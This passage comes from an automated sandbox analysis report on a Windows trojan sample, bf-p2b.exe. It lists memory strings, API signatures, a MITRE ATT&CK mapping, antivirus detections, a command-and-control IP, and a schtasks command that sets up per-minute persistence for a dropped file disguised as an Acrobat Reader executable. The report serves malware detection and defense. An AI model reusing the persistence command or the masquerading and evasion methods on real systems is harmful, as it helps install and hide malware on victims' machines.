                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ysvchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [startmenuexperiencehost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \runtimebroker.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ]searchapp.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ^runtimebroker.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: `svchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fdllhost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )gsmartscreen.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: jsvchost.exe`
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nwmiprvse.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ah]p
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: textinputhost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: audiodg.exe(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ch0*l
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: runtimebroker.exe(
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: runtimebroker.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mousocoreworker.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: applicationframehost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winstore.app.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "( "o
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: systemsettings.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: useroobebroker.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 580 # q #
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wmiprvse.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #h!`h`h`h
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sgrmbroker.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: svchost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0$0$0$g
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8:8:`-`-`-
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllhost.exex
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: joooy
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cscript.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x x @d@d@d$d
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: conhost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: conhost.exep
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %u]$
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,0hjo
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: backgroundtaskhost.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "(8oo
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .p,p,p,
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hgbw0
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "(pto
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: runtimebroker.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: upfc.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h%h%
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hxyosdapdtxxjozxxwdxuyatksdfk.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pg`g8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: `gpg8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @g0g8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pg@g8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0g g8
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bh8)p
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bh04p
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bh(?p
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bhxfp
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bh jp
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bhpqp
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bhh\p
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bh`gp
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bhxrp
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bhp}p
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9]?l;
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllhost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bf-p2b.exe
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d555k
                Source: bf-p2b.exe, 00000000.00000003.1687690122.00000000044D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.exe
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: !this program cannot be run in dos mode.
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: hupx0
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: upx1p
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .rsrc
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 3.07upx!
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 7upw_
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 6)xh
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: o[:=,q
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: c5,-h;
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: oplwj@
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: a@pc00
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: f4k/dr\m
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: (pbu&
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: :jf<q
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: llptj
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: r|$t8hu
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: 3 '(4(
                Source: bf-p2b.exe, 00000000.00000000.1662738087.0000000000B00000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: ~8'p}
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 0
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: x*`dk
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: system
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: registry(
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: smss.exeh
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: csrss.exe(
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wininit.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #s0lm
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: csrss.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: winlogon.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: z3zby
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: services.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: npqpqpqz,
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: v3h[m
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: lsass.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fontdrvhost.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: svchost.exe(
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ,p#p&p#f
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dwm.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: p, )p
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: svchost.exeh
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: s4nrs
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: hh!svchost.exe(
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: x"svchost.exe8
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #memory compressionh
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $svchost.exe
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %svchost.exehmemstr_3a90fb13-f
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &svchost.exememstr_a457a02f-4
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'svchost.exehmemstr_42beacff-6
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )svchost.exememstr_f7660d0a-a
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *svchost.exe(memstr_24f9ed8e-c
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +svchost.exehmemstr_f6df3a63-7
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,svchost.exememstr_af8a2e63-3
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .svchost.exememstr_c8491e52-8
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `4x+`memstr_f4afa748-1
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /svchost.exememstr_d079219d-b
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <(p6(memstr_059e3ec7-2
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0svchost.exememstr_3c21566f-3
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1svchost.exememstr_1307db6b-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2spoolsv.exe(memstr_81440583-d
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 3svchost.exememstr_1b64b95c-e
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4svchost.exe(memstr_acb946ac-4
                Source: bf-p2b.exe, 00000000.00000003.1710258899.0000000004F20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 5svchost.exe(memstr_3c3fa3aa-c
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B3BE95 LogonUserW,0_2_00B3BE95
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B1F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B1F78E
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B0374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,0_2_00B0374E
                Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B47DD5 mouse_event,0_2_00B47DD5
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B3B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B3B398
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B3BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B3BE31
                Source: bf-p2b.exe, Softwarefx-Acrobat-Reader.exe; Binary or memory string: Shell_TrayWnd
                Source: bf-p2b.exe, 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp, Softwarefx-Acrobat-Reader.exe, 00000005.00000002.1710221010.0000000000F7E000.00000040.00000001.01000000.00000007.sdmp, Softwarefx-Acrobat-Reader.exe, 00000006.00000002.1740466666.0000000000F7E000.00000040.00000001.01000000.00000007.sdmp; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\bf-p2b.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B27254 cpuid 0_2_00B27254
                Source: C:\Windows\SysWOW64\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B240DA GetSystemTimeAsFileTime,__aulldiv,0_2_00B240DA
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B32C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B32C3C
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B1E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B1E47B
                Source: C:\Users\user\Desktop\bf-p2b.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
                Source: bf-p2b.exe, 00000000.00000002.2921561992.0000000001511000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                Stealing of Sensitive Information

                Source: Yara match; File source: Process Memory Space: bf-p2b.exe PID: 7420, type: MEMORYSTR
                Source: Yara match; File source: dump.pcap, type: PCAP
                Source: Yara match; File source: Process Memory Space: bf-p2b.exe PID: 7420, type: MEMORYSTR
                Source: Softwarefx-Acrobat-Reader.exe, 0000000F.00000002.2920431525.0000000000F7E000.00000040.00000001.01000000.00000007.sdmp; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                Source: Softwarefx-Acrobat-Reader.exe, 0000000D.00000003.2323612784.0000000004919000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: WIN_81
                Source: Softwarefx-Acrobat-Reader.exe, 00000006.00000003.1729572012.0000000005216000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: WIN_81Y/

                Remote Access Functionality

                Source: Yara match; File source: Process Memory Space: bf-p2b.exe PID: 7420, type: MEMORYSTR
                Source: Yara match; File source: dump.pcap, type: PCAP
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B591DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B591DC
                Source: C:\Users\user\Desktop\bf-p2b.exe; Code function: 0_2_00B596E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B596E2
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe; Code function: 5_2_00F291DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00F291DC
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe; Code function: 5_2_00F296E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00F296E2
                MITRE ATT&CK Matrix (techniques listed per tactic in matrix order; a bracketed number is the count of signatures mapped to that technique, cells without a number are unmatched)

                Initial Access: Valid Accounts [2]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: Windows Management Instrumentation [11]; Scripting [11]; Native API [3]; Scheduled Task/Job [1]; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: Valid Accounts [2]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: Exploitation for Privilege Escalation [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [12]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Scripting [11]; Obfuscated Files or Information [21]; Software Packing [1]; Masquerading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [21]; Process Injection [12]
                Credential Access: Input Capture [21]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: System Time Discovery [2]; File and Directory Discovery [2]; System Information Discovery [27]; Security Software Discovery [161]; Virtualization/Sandbox Evasion [2]; Process Discovery [3]; Application Window Discovery [11]; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: Archive Collected Data [1]; Input Capture [21]; Clipboard Data [12]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [1]; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Network Effects: Exploit SS7 to Redirect Phone Calls/SMS; SIM Card Swap
                Remote Service Effects: Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Source: bf-p2b.exe; Detection: 100%; Scanner: Joe Sandbox ML
                Source: C:\Users\user\AppData\Local\Temp\JWPING.vbs; Detection: 100%; Scanner: Avira; Label: VBS/Runner.VPJI
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe; Detection: 100%; Scanner: Joe Sandbox ML
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe; Detection: 49%; Scanner: ReversingLabs; Label: Win32.Trojan.Nymeria
                No Antivirus matches
                No contacted domains info
                Name: http://ip-score.com/checkip/; Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmp; Malicious: false; Reputation: high
                IP: 172.111.138.100; Domain: unknown; Country: United States; ASN: 3223; ASN Name: VOXILITYGB; Malicious: true
                  Joe Sandbox Version: 38.0.0 Ammolite
                  Analysis ID: 1350639
                  Start date and time: 2023-11-30 17:06:04 +01:00
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 8m 6s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed: 16
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 0
                  Technologies:
